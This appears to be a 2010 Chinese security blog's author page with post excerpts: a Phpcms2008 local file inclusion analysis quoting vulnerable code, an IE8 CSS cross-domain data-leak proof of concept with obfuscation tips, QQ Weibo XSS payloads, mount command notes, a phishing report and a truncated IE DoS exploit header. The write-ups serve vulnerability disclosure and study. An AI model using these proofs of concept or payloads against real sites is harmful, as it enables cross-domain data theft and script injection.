Author: 坏人咖啡

Real Name:

Profile:

Website:

Posts by 坏人咖啡

帮朋友招病毒分析师

date 13 9月 2010 | category 心情随笔

要求:

1:熟悉使用常用安全软件,熟悉互联网,对网络安全有兴趣
2:熟悉病毒功能以及病毒行为的实现方法
3:加壳、脱壳信手拈来
4:熟练使用一种以上的调试和分析工具,如SoftICE,WinDbg,OllyDbg,IDA等
5:对反病毒、逆向工程、系统漏洞等有强烈兴趣,以反病毒、反木马安全事业为己任
6:如对C++程序设计、常用算法、数据结构驾轻就熟,则是病毒查杀工程师 之有力人选

有兴趣的朋友mail:52piaoyu#163.com

Phpcms2008本地文件包含漏洞可执行任意SQL语句

date 13 9月 2010 | category 学习笔记,工具收集

作者:oldjun

Phpcms2008之前已经暴过很多问题了,但这个本地包含一直无人提起,小明曾经在t00ls里核心版块说过,但其实这个本地包含即使不通过旁注也是有办法利用的,那就是增加管理员或者修改管理员密码!

好了,先说本地包含,有几处,我不知道乌云上说的是哪一处,于是我就当其说的是最明显的那处吧。很明显的漏洞,不知道为啥还在phpcms中出现,先看代码:

文件在wap/index.php

[php]
<?php
include ‘../include/common.inc.php’;
include ‘./include/global.func.php’;
$lang = include ‘./include/lang.inc.php’;
if(preg_match(‘/(mozilla|m3gate|winwap|openwave)/i’, $_SERVER[‘HTTP_USER_AGENT’]))
{
header(‘location:../’);//判断,调试时先注释掉
}
wmlHeader($PHPCMS[‘sitename’]);//判断,调试时先注释掉

$action = isset($action) && !empty($action) ? $action : ‘index’;//直接把action带进来了
if($action)
{
include ‘./include/’.$action.’.inc.php’;//本地包含
}

$html = CHARSET != ‘utf-8’ ? iconv(CHARSET, ‘utf-8’, $html) : $html;
echo str_replace(‘
‘, …

Microsoft IE CSS处理跨域信息泄露漏洞

date 09 9月 2010 | category 学习笔记,工具收集

Internet Explorer是Windows操作系统中默认捆绑的web浏览器。

Internet Explorer允许包含跨来源的内容,且CSS解析器在处理内容时是容错的。如果用户在页面中注入某些内容并以样式表的方式导入,就可以获得其他域中网页的敏感信息。
也是很严重的一个漏洞,我们都知道同源策略限制脚本不能跨域读数据,用这个漏洞在IE8里就可以了。
POC:
[html]
www.a.com/test.html:
<body>
{}body{font-family:

aaaaaaaaaaaaaa

bbbbbbbbbbbbbbbb

</body>

www.b.com/test2.html:
<style>
@import url("http://www.a.com/test.html");
</style>

<script>

setTimeout(function(){
var t = document.body.currentStyle.fontFamily;
alert(t);
},2000);

</script>

[/html]

原理:
import 远程文件后,渲染进入当前页面DOM,通过 document.body.currentStyle.fontFamily 访问此内容,估计问题是在IE8里CSS Parser的过程,fontFamily: 后面的内容被当做了value。 FF也没有 currentStyle 这种对象。

我写这篇blog的原因是测试后,有了下面几个TIPS:
1. import 是在整个页面load完成后才加载的,所以我在POC里用了setTimeout

2. 不一定要 fontFamily, 随便自定义一个都可以,比如:
{}body{xxxx:”
然后取的时候:
document.body.currentStyle.xxxx;

3. 引号不是必须的,所以可以写成:
{}body{xxxx:
但我测试的一个case发现不带引号时丢了部分内容,后来重现不了了。

4. 不一定要body, * 也可以
{}*{xxxx:

5. 可以加入各种混淆
{}/*$$%%^^######*/body{xxxx:
{/*$$%%^^######*/}body{xxxx:
{
}body{xxxx:

6. 网站想防御可以转义 {、}、:

7. 可以import本地文件

这类漏洞用于窃取敏感数据非常厉害,进而可以造成很多严重的后果,根据具体场景而定,发挥自己的想象吧。

QQ微博跨站漏洞

date 05 9月 2010 | category 学习笔记

作者:曹同学

下午和曹同学聊了下这个问题,帮他扩展了下思路,晚上又证明了下,虽然可行但是太鸡肋了,利用起来有点蛋痛,好了废话不多说了看曹同学写的文章吧~~!

        qq微博主页有邀请功能,点击邀请就会列出所有的好友分组。当然是在你有种子的情况,负责不会列出分组信息。

       好友组名没有过滤类似<iframe src=baidu.com    <img src=baidu.com   <body onload=alert(3)>的代码,所以在点邀请的时候就会发生跨站。(我感觉是搬起石头砸了自己脚…)

危害:几乎没有

 


各位研究的大牛可以用TX的微博广播把你的地址变短。(坏人咖啡提示)
这个地方没有script提交,即使钓鱼前景也不是很好…

mount挂载命令使用方法

date 03 9月 2010 | category Linux,学习笔记

mount -t 类型 -o 挂接方式 源 目标

-t 详细选项

光盘或光盘镜像:iso9660

DOS fat16文件系统:msdos

Windows 9x fat32文件系统:vfat

Windows NT ntfs文件系统:ntfs

Mount Windows文件网络共享:smbfs(需内核支持) 推荐cifs

UNIX(LINUX) 文件网络共享:nfs

-o 详细选项

loop:用来把一个文件当成硬盘分区挂接上系统

ro:采用只读方式挂接设备

rw:采用读写方式挂接设备

iocharset:指定访问文件系统所用字符集

制作光盘镜像:

当Cdrom有光盘时: cp /dev/cdrom /home/sunky/mydisk.iso

制作指定目录镜像: mkisofs -r -J -V newdisk -o /usr/mydisk.iso /root/mydir

示例:

挂载windows文件共享:

mount -t smbfs -o username=admin,password=8888 //192.168.1.2/c$ /mnt/samba

mount …

最近很忙

date 02 9月 2010 | category 心情随笔

最近公司搬家,很多事情有要做很多事情要处理,每次想写博客的时候突然发现新的事情又来了,只能这样了,工作第一。我想过中秋了应该会放松一段时间吧~~!

警惕利用淘宝漏洞的钓鱼方式

date 13 8月 2010 | category 学习笔记

来源:知道创宇

知道创宇安全团队(KnownSec Team)今天捕获一种利用淘宝上传漏洞的钓鱼方式:由于淘宝网对用户作为店标的图片文件内容过滤不严,黑客可以构造带有图片文件头的特殊HTML文件,然后作为店标上传到淘宝网服务器,当用户使用IE等浏览器访问该文件时,文件中的JS代码将自动跳转到钓鱼网站。由于特殊构造的店标图片具有淘宝网的链接,被QQ等聊天工具认定为安全网站,如果用户不仔细核对每一步的链接很容易落入黑客设下的圈套。

QQ认定链接安全:

打开之后弹出窗口:


钓鱼网站界面和淘宝网的登录页面十分相像:

使用火狐浏览器现了真身:

记录账号密码使用的ASP网页地址:

然后跳转到下一页,记录身份证号和支付密码:

输入完毕之后跳转回淘宝:

知道安全提醒广大网民,使用网银及网购时尽量手工输入网站网址,不要贪图省事而点击不明来源的链接,即便是某些软件验证安全的网站,同时希望大家安装必要的安全防护软件,增强网络安全意识,以免因网络安全事件而影响工作、生活。已经上当的网民请及时更改密码并联系当地公安机关。

看来大家以后也要提高安全意识了,相对这种大企业更应该加强对系统的审核机制。

IE6 / 7 Remote Dos vulnerability

date 29 7月 2010 | category 工具收集

测试代码:

[html]
# Exploit Title: IE6 / 7 Remote Dos vulnerability
# Date: 27/07/2010
# Author: Richard leahy
# Version: 6 / 7
# Tested on: Windows Xp Sp3
#category Remote Dos, might lead to code execution.

# The vulnerability is caused due to specifying a large value …